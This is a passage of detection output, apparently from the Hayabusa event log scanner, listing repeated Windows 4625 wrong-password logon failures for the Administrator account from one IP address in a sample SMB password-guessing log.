3 | Computer: KKDD0O5flEsIEDRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jdPMREVdBEJ50ELC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.626 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p7YwRYYCnsr2v08C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWyAzzpmxUm2CXE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9RNqhxyUBjUIic0n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1JERyz3mOBZt2jki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0i93RW5AOsIKKMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.875 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U3XEu06vE68O900O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.925 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0fxeGE2jXOnoJttj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.969 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Wdg3l6IFHTdh09j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.028 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XLVQRnkUd3bfgvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rHjqFQwqpCJFI6qP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.139 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L5pEWq2mYsFpFLbb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSFKJXTC2wlyw0gu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vh5igCJpAA5rmqzV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5NzLlJWkfXDcm64c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9sR1QHgZ4oaa82F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.340 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pq1GWcKzSHSP28hk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: agCtM0s62zXPop0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.430 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVvglj7RtxrBUeXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.482 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMbS0sIpbFDqJvMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.525 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldO0cAZ54BRHHDyz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.577 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmJH2QWFPiYarKh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5fCiyHtI0OTo8pBO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.664 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3vkVuU43tsYHUSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.714 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3w21sFOu2u7FTDZM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.756 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bk7eaqQNK1CEgqoj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.792 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rv5joLgkm3QUYPyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4l15usDM7jggwEyw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.887 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9QpOvgDmiOgzQqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.935 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dqyr8tb9TrO1aJNe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.985 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hI1bzjixP8eOdDbw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.032 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMTAp20wXS3d1OCk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.078 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrQGfxInmlgPqGtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcsMMQbsnUdyLJWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.224 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oRYZqBBsq9GyApI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0TAhib6p8fY5iOgI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.306 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FerGHj9abOe6ehZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.362 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kN4B4KLpXbyKZzGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HJtoyRfP38T3KToO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkI5hLApUWhGnKIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZCPSO4JLjMur2Eow | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHmrv2xFuq7TyIQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8SqYq3msNfFh24lg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YE0a2Bypzc1MMdGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.670 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ojgIg88VK6hB72PI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehLrf2GoAhY3Rf7Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ccfgpjwpis15B4gY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vysSf3DsOxQf5fVd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEp88cEeiNw4IQsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.876 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5PXDJPzw0gPdlCiH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mwoe9IgWx2UZ7Iuu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3eW0nFDUwKFzoQIw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.988 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q0i0p5QxJ4ykYYJt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.033 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VsxqWAnd6j2CdyB3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.090 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5qdy80mtFWl199k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.121 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ce0d84uBK4t2sqR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.176 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4dZYZEW1VijjwHN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmqGJWbeap5dv0gC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.266 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaNUqChgVSbDkFQu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.319 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B4PDZ55it0V4QGnM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.370 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQxXVB8Aj5gaw2f2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.421 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzDeZtgSJoH74GYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.469 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iNAFsZraFvw67WWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.533 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aVdnbyzWqk58rOW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjUH2PopXCrrPzqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.616 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ylmV2z3WjTWsTpyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.654 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qBKZTYRTKuEAgS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JvekO4A5f6QK2ynZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.753 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDUqydSeA1guOjIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o71TltsJDyOIuLQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXT3MSCes42dVCNn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FGXiWeT8Evr6G70M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V2RarzrnGgcLaseH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.968 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3k7dXu9o1vMkhby | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.009 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EDBt76dmYnPstFWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.041 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4yjzMC7cw0fe7gjS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eQOWCM7KP68DZTX9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.119 